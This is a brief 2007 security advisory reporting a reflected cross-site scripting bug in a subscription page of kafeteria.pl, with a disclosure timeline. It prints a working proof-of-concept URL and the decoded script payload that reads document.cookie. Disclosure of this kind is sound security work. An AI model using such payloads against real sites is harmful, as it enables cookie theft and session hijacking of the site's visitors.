kanedaaa... ... borys ... bohater ...
+ Subject:
XSS bug for www.kafeteria.pl
+ Version:
2007.04.09
+ Discovered by:
Kanedaaa: http://kaneda.bohater.net
+ kafeteria.pl Description:
Magazine for Womans (part of o2.pl portal).
+ Description:
XSS IN:
http://kafeteria.pl/prenumerata.php?email_sub=%22%3E%3CSCRIPT%3Ealert(document.cookie)%3C/SCRIPT%3E
Sent data:
"><script>alert(document.cookie);</script>
Its nothing special, because this site is without any kind of authentication.
Timeline:
2007.04.09 bug discovered
2007.04.09 "/" bug sent via mail from http://kontakt.o2.pl/index.php?help_o2=0&dzial=form&mode=form&cate_id=63
Original Advisory: http://kaneda.bohater.net/security/20070409-xss-kafeteria.pl.php
Check my other bugs in security section: Security